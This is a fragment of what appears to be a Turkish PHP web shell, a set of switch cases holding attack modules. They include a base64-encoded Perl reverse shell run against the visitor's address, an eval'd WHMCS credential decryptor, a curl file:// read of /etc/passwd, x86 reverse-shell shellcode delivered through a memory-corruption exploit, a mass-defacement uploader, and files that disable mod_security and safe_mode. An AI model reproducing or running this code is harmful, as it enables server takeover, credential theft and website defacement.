- TkU8L2ZvbnQ+PC9iPiI7fWVsc2V7ZWNobyAiPGZvbnQgY29sb3I9cmVkPiRkZjwvZm9udD48L2I+
- Ijt9IAovL2Rpc2FibGUgZnVuY3Rpb24gZW5kLS0gCj8+';
- $file = fopen("suexec.php" ,"w+");
- $write = fwrite ($file ,base64_decode($izodayi));
- fclose($file);
- echo "<iframe src=suexec/suexec.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_21":
- # coded by izo
- {
- print "Bağlanılıyor...\n";
- $fippi=$_SERVER["REMOTE_ADDR"];
- $bpci="22";
- $izocinx = 'ICAgICMhL3Vzci9iaW4vcGVybAogICAgIAogICAgICAgIHVzZSBTb2NrZXQ7CiAgICAgICAgJGMw
- ZGUgPSAkQVJHVlswXTsKICAgICAgICAkYWFhYSA9ICRBUkdWWzFdOwogICAgICAgICAgaWYgKCEk
- QVJHVlswXSkgewogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xuIjsKICAgICAgICAgIHByaW50ZiAiIyMj
- IyMjU2ltcGxlIEJhY2sgQ29ubmVjdCBDb2RlZCBCeSBjMGRlLCBCSGFjayBtZW1iZXIjIyMjIyNc
- biI7CiAgICAgICAgICBwcmludGYgIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXG4iOwogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMj
- I1VzYWdlOiBJUCBQb3J0IHwgRXguIDEyNy4wLjAuMSA4ODg4IyMjIyMjIyMjIyMjI1xuIjsKICAg
- ICAKICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQogICAgICAgIHByaW50ICJDb25uZWN0aW5n
- IHRvICRjMGRlXG4iOwogICAgICAgICRiYWxjYW4gPSBnZXRwcm90b2J5bmFtZSgndGNwJyk7CiAg
- ICAgICAgc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRiYWxjYW4pIHx8IGRp
- ZSAoIkVycjByIHdoZW4gdHJ5aW5nIHRvIGNvbm5lY3QgIFtjaGVjayBJUDpQb3J0XSIpOwogICAg
- ICAgIGlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRhYWFhLCBpbmV0X2F0
- b24oJGMwZGUpKSkge2RpZSgiRXJyMHIgd2hlbiB0cnlpbmcgdG8gY29ubmVjdCAgW2NoZWNrIElQ
- OlBvcnRdICIpO30KICAgICAKICAgICAgICAgIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7CiAgICAg
- ICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsKICAgICAgICAgIG9wZW4oU1RERVJSLCI+JlNF
- UlZFUiIpOwogICAgICAgICAgZXhlYyB7Jy9iaW4vc2gnfSAnLWJhc2gnIC4gIlwwIiB4IDQ7';
- $file = fopen("dayi" ,"w+");
- $write = fwrite ($file ,base64_decode($izocinx));
- fclose($file);
- chmod("dayi" , 0777);
- system("perl dayi $fippi $bpci");
- }
- break;
- case "PHP_23":
- eval(base64_decode("IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyAgICAgIFdITUNTIFNlcnZlciBQYXNzd29yZCBkZWNvZGVyICAgICAgICMNCiMgICAgICBDb2RlZCBCeSBSQUIzT1VOICAgICAgICAgICAgICAgICAgICAjDQojICAgICAgICAgIHYuYi00QGhvdG1haWwuY29tICAgICAgICAgICAgICAgIw0KI05vdGUgOiBJJ20gUHJvdWQgdG8gYmUgfn5UVU5JU0lBTn5+ICAgICAgICMgIA0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQoNCg0KZnVuY3Rpb24gZGVjcnlwdCAoJHN0cmluZywkY2NfZW5jcnlwdGlvbl9oYXNoKQ0Kew0KDQoJJGtleSA9IG1kNSAobWQ1ICgkY2NfZW5jcnlwdGlvbl9oYXNoKSkgLiBtZDUgKCRjY19lbmNyeXB0aW9uX2hhc2gpOw0KCSRoYXNoX2tleSA9IF9oYXNoICgka2V5KTsNCgkkaGFzaF9sZW5ndGggPSBzdHJsZW4gKCRoYXNoX2tleSk7DQoJJHN0cmluZyA9IGJhc2U2NF9kZWNvZGUgKCRzdHJpbmcpOw0KCSR0bXBfaXYgPSBzdWJzdHIgKCRzdHJpbmcsIDAsICRoYXNoX2xlbmd0aCk7DQoJJHN0cmluZyA9IHN1YnN0ciAoJHN0cmluZywgJGhhc2hfbGVuZ3RoLCBzdHJsZW4gKCRzdHJpbmcpIC0gJGhhc2hfbGVuZ3RoKTsNCgkkaXYgPSAkb3V0ID0gJyc7DQoJJGMgPSAwOw0KCXdoaWxlICgkYyA8ICRoYXNoX2xlbmd0aCkNCgl7DQoJCSRpdiAuPSBjaHIgKG9yZCAoJHRtcF9pdlskY10pIF4gb3JkICgkaGFzaF9rZXlbJGNdKSk7DQoJCSsrJGM7DQoJfQ0KDQoJJGtleSA9ICRpdjsNCgkkYyA9IDA7DQoJd2hpbGUgKCRjIDwgc3RybGVuICgkc3RyaW5nKSkNCgl7DQoJCWlmICgoJGMgIT0gMCBBTkQgJGMgJSAkaGFzaF9sZW5ndGggPT0gMCkpDQoJCXsNCgkJCSRrZXkgPSBfaGFzaCAoJGtleSAuIHN1YnN0ciAoJG91dCwgJGMgLSAkaGFzaF9sZW5ndGgsICRoYXNoX2xlbmd0aCkpOw0KCQl9DQoNCgkJJG91dCAuPSBjaHIgKG9yZCAoJGtleVskYyAlICRoYXNoX2xlbmd0aF0pIF4gb3JkICgkc3RyaW5nWyRjXSkpOw0KCQkrKyRjOw0KCX0NCg0KCXJldHVybiAkb3V0Ow0KfQ0KDQoNCmZ1bmN0aW9uIF9oYXNoICgkc3RyaW5nKQ0Kew0KCWlmIChmdW5jdGlvbl9leGlzdHMgKCdzaGExJykpDQoJew0KCQkkaGFzaCA9IHNoYTEgKCRzdHJpbmcpOw0KCX0NCgllbHNlDQoJew0KCQkkaGFzaCA9IG1kNSAoJHN0cmluZyk7DQoJfQ0KDQoJJG91dCA9ICcnOw0KCSRjID0gMDsNCgl3aGlsZSAoJGMgPCBzdHJsZW4gKCRoYXNoKSkNCgl7DQoJCSRvdXQgLj0gY2hyIChoZXhkZWMgKCRoYXNoWyRjXSAuICRoYXNoWyRjICsgMV0pKTsNCgkJJGMgKz0gMjsNCgl9DQoNCglyZXR1cm4gJG91dDsNCn0NCg0KIGlmKCRfUE9TVFsnZm9ybV9hY3Rpb24nXSA9PSAxICkNCiB7DQogLy9pbmNsdWRlKCRmaWxlKTsNCg0KICRmaWxlPSgkX1BPU1RbJ2ZpbGUnXSk7DQokdGV4dD1maWxlX2dldF9jb250ZW50cygkZmlsZSk7DQoNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPD9waHAiLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8PyIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIj8+IiwgIiIsICR0ZXh0KTsNCg0KZXZhbCgkdGV4dCk7DQoNCiAgICAkbGluaz1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIDsNCgkgICAgbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lLCRsaW5rKSA7DQoNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHNlcnZlcnMiKTsNCg0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRpcGFkZHJlc3MgPSAkdlsnaXBhZGRyZXNzJ107DQokdXNlcm5hbWUgPSAkdlsndXNlcm5hbWUnXTsNCiR0eXBlID0gJHZbJ3R5cGUnXTsNCiRhY3RpdmUgPSAkdlsnYWN0aXZlJ107DQokaG9zdG5hbWUgPSAkdlsnaG9zdG5hbWUnXTsNCg0KZWNobygiPGNlbnRlcj48dGFibGUgYm9yZGVyPScxJz4iKTsNCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmVjaG8oIjx0cj48dGQ+VHlwZTwvdGQ+PHRkPiR0eXBlPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5BY3RpdmU8L3RkPjx0ZD4kYWN0aXZlPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5Ib3N0bmFtZTwvdGQ+PHRkPiRob3N0bmFtZTwvdGQ+PC90cj4iKTsNCmVjaG8oIjx0cj48dGQ+SXA8L3RkPjx0ZD4kaXBhZGRyZXNzPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5Vc2VybmFtZTwvdGQ+PHRkPiR1c2VybmFtZTwvdGQ+PC90cj4iKTsNCmVjaG8oIjx0cj48dGQ+UGFzc3dvcmQ8L3RkPjx0ZD4kcGFzc3dvcmQ8L3RkPjwvdHI+Iik7DQoNCg0KZWNobyAiPC90YWJsZT48YnI+PGJyPjwvY2VudGVyPiI7DQoNCn0NCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgOw0KCSAgICBteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUsJGxpbmspIDsNCg0KJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJscmVnaXN0cmFycyIpOw0KZWNobygiPGNlbnRlcj5Eb21haW4gUmVzZWxsZXIgPGJyPjx0YWJsZSBib3JkZXI9JzEnPiIpOw0KZWNobygiPHRyPjx0ZD5SZWdpc3RyYXI8L3RkPjx0ZD5TZXR0aW5nPC90ZD48dGQ+VmFsdWU8L3RkPjwvdHI+Iik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCg0KJHJlZ2lzdHJhciAJPSAkdlsncmVnaXN0cmFyJ107DQokc2V0dGluZyA9ICR2WydzZXR0aW5nJ107DQokdmFsdWUgPSBkZWNyeXB0ICgkdlsndmFsdWUnXSwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQokcGFzc3dvcmQgPSBkZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQplY2hvKCI8dHI+PHRkPiRyZWdpc3RyYXI8L3RkPjx0ZD4kc2V0dGluZzwvdGQ+PHRkPiR2YWx1ZTwvdGQ+PC90cj4iKTsNCg0KDQoNCg0KDQp9DQplY2hvICI8L3RhYmxlPjxicj48YnI+PC9jZW50ZXI+IjsNCn0NCg0KDQoNCiBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMiApDQogew0KIC8vaW5jbHVkZSgkZmlsZSk7DQoNCiAkZGJfaG9zdD0oJF9QT1NUWydkYl9ob3N0J10pOw0KICRkYl91c2VybmFtZT0oJF9QT1NUWydkYl91c2VybmFtZSddKTsNCiAkZGJfcGFzc3dvcmQ9KCRfUE9TVFsnZGJfcGFzc3dvcmQnXSk7DQogJGRiX25hbWU9KCRfUE9TVFsnZGJfbmFtZSddKTsNCiAkY2NfZW5jcnlwdGlvbl9oYXNoPSgkX1BPU1RbJ2NjX2VuY3J5cHRpb25faGFzaCddKTsNCg0KDQoNCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgOw0KCSAgICBteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUsJGxpbmspIDsNCg0KJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsc2VydmVycyIpOw0KDQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCg0KJGlwYWRkcmVzcyA9ICR2WydpcGFkZHJlc3MnXTsNCiR1c2VybmFtZSA9ICR2Wyd1c2VybmFtZSddOw0KJHR5cGUgPSAkdlsndHlwZSddOw0KJGFjdGl2ZSA9ICR2WydhY3RpdmUnXTsNCiRob3N0bmFtZSA9ICR2Wydob3N0bmFtZSddOw0KDQplY2hvKCI8Y2VudGVyPjx0YWJsZSBib3JkZXI9JzEnPiIpOw0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KZWNobygiPHRyPjx0ZD5UeXBlPC90ZD48dGQ+JHR5cGU8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPkFjdGl2ZTwvdGQ+PHRkPiRhY3RpdmU8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPkhvc3RuYW1lPC90ZD48dGQ+JGhvc3RuYW1lPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5JcDwvdGQ+PHRkPiRpcGFkZHJlc3M8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPlVzZXJuYW1lPC90ZD48dGQ+JHVzZXJuYW1lPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5QYXNzd29yZDwvdGQ+PHRkPiRwYXNzd29yZDwvdGQ+PC90cj4iKTsNCg0KDQplY2hvICI8L3RhYmxlPjxicj48YnI+PC9jZW50ZXI+IjsNCg0KfQ0KDQoNCiAgICAkbGluaz1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIDsNCgkgICAgbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lLCRsaW5rKSA7DQoNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHJlZ2lzdHJhcnMiKTsNCmVjaG8oIjxjZW50ZXI+RG9tYWluIFJlc2VsbGVyIDxicj48dGFibGUgYm9yZGVyPScxJz4iKTsNCmVjaG8oIjx0cj48dGQ+UmVnaXN0cmFyPC90ZD48dGQ+U2V0dGluZzwvdGQ+PHRkPlZhbHVlPC90ZD48L3RyPiIpOw0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRyZWdpc3RyYXIgCT0gJHZbJ3JlZ2lzdHJhciddOw0KJHNldHRpbmcgPSAkdlsnc2V0dGluZyddOw0KJHZhbHVlID0gZGVjcnlwdCAoJHZbJ3ZhbHVlJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KaWYgKCR2YWx1ZT09IiIpIHsNCiR2YWx1ZT0wOw0KfQ0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KZWNobygiPHRyPjx0ZD4kcmVnaXN0cmFyPC90ZD48dGQ+JHNldHRpbmc8L3RkPjx0ZD4kdmFsdWU8L3RkPjwvdHI+Iik7DQoNCg0KDQoNCg0KfQ0KZWNobyAiPC90YWJsZT48YnI+PGJyPjwvY2VudGVyPiI7DQp9DQoNCg0KDQoNCj8+PGJvZHkgYmdjb2xvcj0iIzAwMDAwMCI+DQogPHN0eWxlPg0KDQpCT0RZIHsgU0NST0xMQkFSLUJBU0UtQ09MT1I6ICMxOTE5MTk7IFNDUk9MTEJBUi1BUlJPVy1DT0xPUjogb2xpdmU7ICAgY29sb3I6IHdoaXRlO30NCnRleHRhcmVhe2JhY2tncm91bmQtY29sb3I6IzE5MTkxOTtjb2xvcjpyZWQ7Zm9udC13ZWlnaHQ6Ym9sZDtmb250LXNpemU6IDEycHg7Zm9udC1mYW1pbHk6IFRhaG9tYTsgYm9yZGVyOiAxcHggc29saWQgIzY2NjY2Njt9DQppbnB1dHtGT05ULVdFSUdIVDpub3JtYWw7YmFja2dyb3VuZC1jb2xvcjogIzE5MTkxOTtmb250LXNpemU6IDEzcHg7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjogcmVkOyBmb250LWZhbWlseTogVGFob21hOyBib3JkZXI6IDFweCBzb2xpZCAjNjY2NjY2O2hlaWdodDoxN30NCjwvc3R5bGU+DQo8Y2VudGVyPg0KPGZvbnQgY29sb3I9IiNGRkZGNkZGIiBzaXplPScrMyc+WyB+fiBXSE1DUyBTZXJ2ZXIgUGFzc3dvcmQgZGVjb2RlciB+fiBdPC9mb250Pjxicj48YnI+DQo8Zm9udCBjb2xvcj0iIzAwNjZGRiIgc2l6ZT0nKzInPlN5bWxpbmsgdG8gY29uZmlndXJhdGlvbi5waHAgb2YgV0hNQ1M8L2ZvbnQ+PGJyPg0KPC9jZW50ZXI+DQo8Rk9STSBhY3Rpb249IiIgIG1ldGhvZD0icG9zdCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmb3JtX2FjdGlvbiIgdmFsdWU9IjEiPg0KPGJyPg0KIDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZmlsZSIgdmFsdWU9IiI+DQo8YnI+DQo8SU5QVVQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0Ij4NCjwvRk9STT4NCjxocj4NCg0KPGJyPg0KPGNlbnRlcj4NCjxmb250IGNvbG9yPSIjMDA2NkZGIiBzaXplPScrMic+REIgY29uZmlndXJhdGlvbiBvZiBXSE1DUzwvZm9udD48YnI+DQo8L2NlbnRlcj4NCjxGT1JNIGFjdGlvbj0iIiAgbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZvcm1fYWN0aW9uIiB2YWx1ZT0iMiI+DQo8YnI+DQo8dGFibGUgYm9yZGVyPTE+DQoNCjx0cj48dGQ+ZGJfaG9zdCA8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMzAiIG5hbWU9ImRiX2hvc3QiIHZhbHVlPSJsb2NhbGhvc3QiPjwvdGQ+PC90cj4NCjx0cj48dGQ+ZGJfdXNlcm5hbWUgPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjMwIiBuYW1lPSJkYl91c2VybmFtZSIgdmFsdWU9IiI+PC90ZD48L3RyPg0KPHRyPjx0ZD5kYl9wYXNzd29yZDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZGJfcGFzc3dvcmQiIHZhbHVlPSIiPjwvdGQ+PC90cj4NCjx0cj48dGQ+ZGJfbmFtZTwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZGJfbmFtZSIgdmFsdWU9IiI+PHRkPjwvdHI+DQo8dHI+PHRkPmNjX2VuY3J5cHRpb25faGFzaDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iY2NfZW5jcnlwdGlvbl9oYXNoIiB2YWx1ZT0iIj48L3RkPjwvdHI+DQoNCjwvdGFibGU+DQo8YnI+DQo8SU5QVVQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0Ij4NCjwvRk9STT4NCjxocj4NCjxjZW50ZXI+DQo8Zm9udCBjb2xvcj0iIzAwNjZGRiIgc2l6ZT0nKzInPlBhc3N3b3JkIGRlY29kZXI8L2ZvbnQ+PGJyPg0KPD8NCiBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMyApDQogew0KDQoNCg0KICRwYXNzd29yZD0oJF9QT1NUWydwYXNzd29yZCddKTsNCg0KICRjY19lbmNyeXB0aW9uX2hhc2g9KCRfUE9TVFsnY2NfZW5jcnlwdGlvbl9oYXNoJ10pOw0KDQoNCiRwYXNzd29yZCA9IGRlY3J5cHQgKCRwYXNzd29yZCwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQoNCmVjaG8oIlBhc3N3b3JkIGlzICIuJHBhc3N3b3JkKTsNCg0KfQ0KPz4NCjwvY2VudGVyPg0KPEZPUk0gYWN0aW9uPSIiICBtZXRob2Q9InBvc3QiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZm9ybV9hY3Rpb24iIHZhbHVlPSIzIj4NCjxicj4NCjx0YWJsZSBib3JkZXI9MT4NCg0KPHRyPjx0ZD5QYXNzd29yZDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0icGFzc3dvcmQiIHZhbHVlPSIiPjwvdGQ+PC90cj4NCjx0cj48dGQ+Y2NfZW5jcnlwdGlvbl9oYXNoPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjMwIiBuYW1lPSJjY19lbmNyeXB0aW9uX2hhc2giIHZhbHVlPSIiPjwvdGQ+PC90cj4NCg0KPC90YWJsZT4NCjxicj4NCjxJTlBVVCBjbGFzcz1zdWJtaXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VibWl0IiBuYW1lPSJTdWJtaXQiPg0KPC9GT1JNPg0KPGhyPg0KDQoNCiAgPGNlbnRlcj4gPGZvbnQgY29sb3I9IiNGRkZGNkZGIiBzaXplPScrMSc+ICAgQ29kZWQgQnkgUkFCM09VTiB2LmItNEBob3RtYWlsLmNvbSAgICA8L2ZvbnQ+PGJyPjxicj4gPGNlbnRlcj4=
- "));
- break;
- case "PHP_24":
- $code=stripslashes($_POST['code']);
- echo '<center><br><h3> PHP Code Evaluating </h3></center>
- <center>
- <form method="POST" action="">
- <input type="hidden" name="id" value="eval">
- <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'mkDIR("file:");
- chdir("file:");
- mkDIR("etc");
- chdir("etc");
- mkDIR("passwd");
- chdir("..");
- chdir("..");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_exec($ch);
- curl_close($ch);</textarea><br><br>
- <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
- </form>
- <textarea rows="10" cols="85" class="textarea">';
- eval($code);
- echo '</textarea><br><br>';
- break;
- case "PHP_25":
- $shellcode = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89".
- "\xe1\xcd\x80\x52\x43\x68\xff\x02".
- "\x22\xb8". //port (8888)
- "\x89\xe1".
- "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80".
- "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0".
- "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80".
- "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f".
- "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
- $________________________str = str_repeat("A", 39);
- $________________________yyy = &$________________________str;
- $________________________xxx = &$________________________str;
- for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str;
- $________________________aaa = " XXXXX ";
- $________________________aab = " XXXx.xXXX ";
- $________________________aac = " XXXx.xXXX ";
- $________________________aad = " XXXXX ";
- unset($________________________xxx);
- unset($________________________aaa);
- unset($________________________aab);
- unset($________________________aac);
- unset($________________________aad);
- $arr = array($shellcode => 1);
- $addr = unpack("L", substr($________________________str, 6*4, 4));
- $addr = $addr[1] + 32;
- $addr = pack("L", $addr);
- for ($i=0; $i<strlen($addr); $i++) {
- $________________________str[8*4+$i] = $addr[$i];
- $________________________yyy[8*4+$i] = $addr[$i];
- }
- unset($arr);
- break;
- case "PHP_26":
- $crackftp = 'PGh0bWw+DQo8aGVhZD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0tDQpib2R5IHsgY29sb3I6IzAwMDsNCn0NCmJvZHkgKnsgbWFyZ2luOiAwOyBwYWRkaW5nOiAwOyBmb250LWZhbWlseTpDZW50dXJ5IEdvdGhpYywgQ29taWMgU2FucyBNUzt9DQphCXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IGNvbG9yOiMzMzY2OTk7IH0NCmE6aG92ZXIgeyB0ZXh0LWRlY29yYXRpb246IHVuZGVybGluZTsgfQ0KYm9keSwgdGR7ICBtYXJnaW46IDA7ICBwYWRkaW5nOiAwOyAgZm9udC1zaXplOiBub3JtYWw7fQ0KYnsgZm9udC13ZWlnaHQ6Ym9sZDsgfQ0KaW5wdXQsdGV4dGFyZWEsc2VsZWN0IHsNCgljb2xvcjojMzM2Njk5Ow0KCWJhY2tncm91bmQtY29sb3I6I2ZmZjsNCglmb250LWZhbWlseTpDZW50dXJ5IEdvdGhpYywgQXJpYWw7DQogICAgZm9udC13ZWlnaHQ6IGJvbGQ7DQoJYm9yZGVyOjFweCBzb2xpZCAjMzMzOw0KCW1hcmdpbjoycHg7DQoJYm9yZGVyLXJhZGl1czogNnB4Ow0KCS13ZWJraXQtYm9yZGVyLXJhZGl1czogNnB4Ow0KCS1tb3otYm9yZGVyLXJhZGl1czogNnB4Ow0KfQ0KaW5wdXQuc3VibWl0LGlucHV0W3R5cGU9c3VibWl0XQ0Kew0KbWFyZ2luOjJweDsNCmJhY2tncm91bmQtY29sb3I6IzZkODRiNDsNCmJvcmRlcjoxcHggc29saWQgIzAwMDAwMDsNCmZvbnQtd2VpZ2h0OmJvbGQ7DQpjb2xvcjojZmZmZmZmDQp9DQouSGVhZGVyIHsgDQpiYWNrZ3JvdW5kOiAjMzM2Njk5OyANCnRleHQtYWxpZ246Y2VudGVyOyANCnBhZGRpbmc6MnB4OyBjb2xvcjogDQojZmZmOyBmb250LXdlaWdodDpib2xkOw0KfQ0KLmZvb3RlcntiYWNrZ3JvdW5kOiNEREU3RjE7IGZvbnQtd2VpZ2h0OmJvbGQ7IGJvcmRlci10b3A6MXB4IHNvbGlkICNhYmM7IHBhZGRpbmc6NXB4OyBmb250LXdlaWdodDpib2xkOyB0ZXh0LWFsaWduOmNlbnRlcjsgIH0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGJyLz4NCjxiPg0KPGZvcm0gRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8PyRfU0VSVkVSWydQSFBfU0VMRiddPz4iIG1ldGhvZD1wb3N0Pg0KRm9sZGVyIDo8YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9cGF0aCBzaXplPTYwIHZhbHVlPSI8Pz1nZXRjd2QoKTs/PiI+PGJyPg0KRmlsZSBOYW1lIDo8YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9ZmlsZSBzaXplPTYwIHZhbHVlPSJpbmRleC5odG1sIj48YnI+DQpEZWZhY2UgUGFnZSBVUkwgOiA8c21hbGw+KGV4OiBodHRwOi8vc2l0ZS5jb20vYWxtYXhoYWNrZXJpbmRleC50eHQpPC9zbWFsbD48YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9dXJsIHNpemU9NjAgdmFsdWU9Imh0dHA6Ly9zaXRlLmNvbS9hbG1heGhhY2tlcmluZGV4LnR4dCI+PGJyPg0KPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPURlZmFjZT4NCjwvZm9ybT4NCjw/cGhwDQokbWFpbnBhdGg9JF9QT1NUW3BhdGhdOw0KJGZpbGU9JF9QT1NUW2ZpbGVdOw0KJGluZGV4dXJsPSRfUE9TVFt1cmxdOw0KZWNobyAiPGJyPiI7DQokZGlyPW9wZW5kaXIoIiRtYWlucGF0aCIpOw0Kd2hpbGUoJHJvdz1yZWFkZGlyKCRkaXIpKQ0Kew0KJHN0YXJ0PUBmb3BlbigiJHJvdy8kZmlsZSIsIncrIik7DQokY29kZT1AZmlsZV9nZXRfY29udGVudHMoJGluZGV4dXJsKTsNCiRmaW5pc2g9QGZ3cml0ZSgkc3RhcnQsJGNvZGUpOw0KaWYgKCRmaW5pc2gpDQp7DQplY2hvICImIzE4NzsgJHJvdy8kZmlsZSAgJiMxODc7IERvbmU8YnI+PGJyPiI7DQp9DQp9DQo/Pg0KPC9ib2R5Pg0KPC9odG1sPg==';
- $file = fopen("masss.php" ,"w+");
- $write = fwrite ($file ,base64_decode($crackftp));
- fclose($file);
- echo "<iframe src=ftpcrack.php width=100% height=100% frameborder=0></iframe> ";
- break;
- case "PHP_27":
- mkdir('safeof', 0755);
- chdir('safeof');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
- $metin = "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $kokdosya = "php.ini";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
- $metin = "safe_mode = OFF
- disable_functions = NONE";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $mini = 'PEJPRFkgT25LZXlQcmVzcz0iR2V0S2V5Q29kZSgpOyIgdGV4dD0jZmZmZmZmIGJvdHRvbU1hcmdp
